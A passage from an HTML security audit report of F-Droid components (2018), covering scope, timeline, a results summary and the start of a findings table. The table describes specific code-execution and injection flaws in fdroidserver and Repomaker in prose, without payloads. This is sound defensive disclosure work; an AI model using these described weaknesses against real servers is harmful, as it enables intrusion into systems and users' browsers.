href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f35-potential-sql-injection"><span>4.1.19</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f35-potential-sql-injection">OTF-019 — Potential SQL Injection</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f35-potential-sql-injection"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; 
margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f41-app-uses-data-from-clipboard"><span>4.1.20</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f41-app-uses-data-from-clipboard">OTF-020 — Unverified URI redirect</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f41-app-uses-data-from-clipboard"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f43-file-deleted-unconditionally"><span>4.1.21</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f43-file-deleted-unconditionally">OTF-021 — File Deleted Unconditionally</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f43-file-deleted-unconditionally"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f44-secure-temp-file-usage-recommended"><span>4.1.22</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f44-secure-temp-file-usage-recommended">OTF-022 — Secure Temp File Usage Recommended</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f44-secure-temp-file-usage-recommended"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"><span>4.1.23</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a 
href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues">OTF-023 — (fdroidclient) App Is Signed With `SHA1withRSA`, Known to Have Collision Issues</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f47--fdroidclient-raw-sql-query-executions"><span>4.1.24</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f47--fdroidclient-raw-sql-query-executions">OTF-024 — (fdroidclient) Raw SQL Query Executions</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f47--fdroidclient-raw-sql-query-executions"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-"><span>4.1.25</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-">OTF-025 — (fdroid Client) Snooping in Between Clients in "Nearby Swap"</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f52--fdroid-client-insecure-implementation-of-ssl"><span>4.1.26</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a 
href="#f52--fdroid-client-insecure-implementation-of-ssl">OTF-026 — (fdroid Client) Insecure Implementation of SSL</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f52--fdroid-client-insecure-implementation-of-ssl"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"><span>4.1.27</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues">OTF-027 — (Privilege Extension) Mobile application package signed with weak algorithm `SHA1withRSA`</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f1-tabnabbing-in-repomaker"><span>4.1.28</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f1-tabnabbing-in-repomaker">OTF-028 — Tabnabbing in Repomaker</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f1-tabnabbing-in-repomaker"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches"><span>4.1.29</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a 
href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches">OTF-029 — Repomaker:apk:_def_get_type Allows for Mime Type Mismatches</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f10-unsafe-html-rendering-of-arbitrary-input"><span>4.1.30</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f10-unsafe-html-rendering-of-arbitrary-input">OTF-030 — Unsafe HTML Rendering of Arbitrary Input</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f10-unsafe-html-rendering-of-arbitrary-input"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py"><span>4.1.31</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py">OTF-031 — Dangerous Deserialization Using Python Pickle in Fdroidserver:update.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f19-starting-a-process-with-a-partial-executable-path"><span>4.1.32</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a 
href="#f19-starting-a-process-with-a-partial-executable-path">OTF-032 — Starting a Process With a Partial Executable Path</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f19-starting-a-process-with-a-partial-executable-path"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py"><span>4.1.33</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py">OTF-033 — Maliciously Crafted Appid Code Injection in Fdroidserver Build.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check"><span>4.1.34</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check">OTF-034 — Missing file type and size validation</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f36-no-mechanism-to-remove-root-ca-keys"><span>4.1.35</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a 
href="#f36-no-mechanism-to-remove-root-ca-keys">OTF-035 — Hardcoded root CA keys</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f36-no-mechanism-to-remove-root-ca-keys"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f37-use-of-rot13-and-base64-encoding"><span>4.1.36</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f37-use-of-rot13-and-base64-encoding">OTF-036 — Use of weak methods for data protection</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f37-use-of-rot13-and-base64-encoding"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f38-untrusted-external-links"><span>4.1.37</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f38-untrusted-external-links">OTF-037 — Untrusted External Links</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f38-untrusted-external-links"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f42-stronger-regular-expression-recommended"><span>4.1.38</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f42-stronger-regular-expression-recommended">OTF-038 — Weak pattern matching filter</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f42-stronger-regular-expression-recommended"><span>•</span></a></div></td></tr><tr><td 
style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#nonFindings"><span>4.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#nonFindings">Non-Findings</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#nonFindings"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f50--fdroid-client-exploiting-the-local-web-server-of-nearby-swap-to-navigate-directories"><span>4.2.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f50--fdroid-client-exploiting-the-local-web-server-of-nearby-swap-to-navigate-directories">NF-001 — (fdroid Client) Exploiting the Local Web Server of "Nearby Swap" to Navigate Directories</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f50--fdroid-client-exploiting-the-local-web-server-of-nearby-swap-to-navigate-directories"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f51--fdroid-client-exploiting-exported-activities-and-broadcasts"><span>4.2.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f51--fdroid-client-exploiting-exported-activities-and-broadcasts">NF-002 — (fdroid Client) Exploiting Exported Activities and Broadcasts</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f51--fdroid-client-exploiting-exported-activities-and-broadcasts"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a 
href="#f54--privilege-extension-static-analysis-of-apk"><span>4.2.3</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f54--privilege-extension-static-analysis-of-apk">NF-003 — (Privilege Extension) Static Analysis of APK</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f54--privilege-extension-static-analysis-of-apk"><span>•</span></a></div></td></tr>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#futurework"><span>5</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#futurework">Future Work</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#futurework"><span>•</span></a></div></td></tr>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#conclusion"><span>6</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#conclusion">Conclusion</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#conclusion"><span>•</span></a></div></td></tr>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#testteam"><span> Appendix 1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#testteam">Testing team</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#testteam"><span>•</span></a></div></td></tr>
</tbody></table></div></div></div><br><hr><div><div style="margin-right: 2cm"><table style="border-bottom-color: black; border-bottom-width: 2mm; border-bottom-style: solid; margin-left: 0cm; margin-right: 0cm;" valign="top"><tbody><tr><td style="margin-left: 0cm; margin-right: 0cm; background-color: #e2632a; text-align: center;" valign="top"><div style="color: white; font-family: Helvetica; font-size: 16pt; margin-top: 0.4cm; margin-bottom: 0.4cm;">Penetration Test Report</div></td></tr><tr><td style="margin-left: 0cm; margin-right: 0cm; background-color: white; padding-left: 0.5cm; padding-top: 0.7cm; padding-bottom: 0.4cm;" valign="top"><div style="color: black; font-family: Helvetica; font-size: 16pt; font-weight: normal;">Open Tech Fund</div></td></tr><tr><td style="margin-left: 0cm; margin-right: 0cm; background-color: white; padding-left: 0.5cm; padding-top: 0.5cm; padding-bottom: 1.2cm;" valign="top"><div><div>V 1.0</div><div>Diemen, August 29th, 2018</div><div>Confidential</div></div></td></tr></tbody></table></div></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="executiveSummary"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Executive Summary</div></td></tr></table></div>
<a name="introduction"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Introduction</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Between February 12, 2018 and April 8, 2018, Radically Open Security B.V. carried out a code audit for Open Tech Fund.
</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">This report contains our findings as well as detailed explanations of exactly
how ROS performed the code audit.</div>
</div>
<a name="scope"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.2</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Scope of work</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">The scope of the penetration test was limited to the following targets:</div>
<div style="margin-left: 2mm;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>•</span></div></td><td width="7.56"> </td><td valign="top"><div>F-droid Client</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>•</span></div></td><td width="7.56"> </td><td valign="top"><div>F-droid Privileged Extension</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>•</span></div></td><td width="7.56"> </td><td valign="top"><div>F-droid Repomaker</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>•</span></div></td><td width="7.56"> </td><td valign="top"><div>F-droid Server</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>•</span></div></td><td width="7.56"> </td><td valign="top"><div>F-droid Website</div></td></tr></table></div>
</div>
<a name="objectives"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.3</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Project objectives</div></td></tr></table></div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">The project objective was to identify vulnerabilities in the Fdroid web application and mobile app. This was to be achieved by performing a code audit and penetration test of the Fdroid app-hosting server application, the Fdroid app for browsing and downloading apps from Fdroid repositories, and the code used to create and register app repositories as part of the Fdroid community.</div>
</div>
<a name="timeline"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.4</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Timeline</div></td></tr></table></div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">The Security Audit took place between February 12 and April 8, 2018.</div>
</div>
<a name="resultsinanutshell"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.5</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Results In A Nutshell</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In all, we report 10 high-impact, 18 moderate-impact and 10 low-impact issues found during the course of the code audit and pen-test.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Some limited-impact issues were found in the code audit of repomaker. Several high-impact code execution and information-leak issues were found in fdroidserver; these allow an adversary to run code on the host running fdroidserver and in the browsers of users visiting fdroid.org.
</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">
Potentially significant-impact issues were found during the Fdroid client code review, ranging from unverified trust through the use of TOFU to insecure communication that enables MiTM attacks.
</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">
During the pen-test, the request-swap functionality of the app was found to potentially allow malicious requests/messages to be accepted and to redirect users to malicious sites. In addition, weaknesses in cryptography usage and the potential for MiTM were discovered.
</div>
</div>
<a name="findingSummary"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.6</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Summary of Findings</div></td></tr></table></div>
<div><table style="margin-bottom: 1.3cm; border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>ID</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Type</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Description</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Threat level</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><a name="summaryTableThreatLevelHigh"></a><div><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker" style="color: #e2632a;">OTF-001</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
The user input sanitizer bleach can be circumvented and thus code
can be injected into browsers which display the descriptions of apps.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver" style="color: #e2632a;">OTF-002</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
It is possible to craft malicious APK files whose appid is passed to a shell without sanitization, allowing arbitrary code execution.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing" style="color: #e2632a;">OTF-003</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Maliciously crafted metadata can be used to run arbitrary code on the fdroidserver host.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f25-infoleak-in-fdroidserver-checkupdates-py" style="color: #e2632a;">OTF-004</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Infoleak</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Attacker controlled URLs can be used first to run a regular expression on a local file, then depending on a match of the expression a second URL can be accessed or not. This can be used to leak information from the fdroid host.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data" style="color: #e2632a;">OTF-005</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The value of VercodeOperation supplied in the metadata of the app by the adversary is eval-ed in the fdroidserver script checkupdates.py.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py" style="color: #e2632a;">OTF-006</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>A maliciously crafted appid can be used to inject code into fdroidserver build.py:1274.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py" style="color: #e2632a;">OTF-007</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The linkify function of DescriptionFormatter in fdroidserver metadata.py allows for injection of javascript into the description of packages.
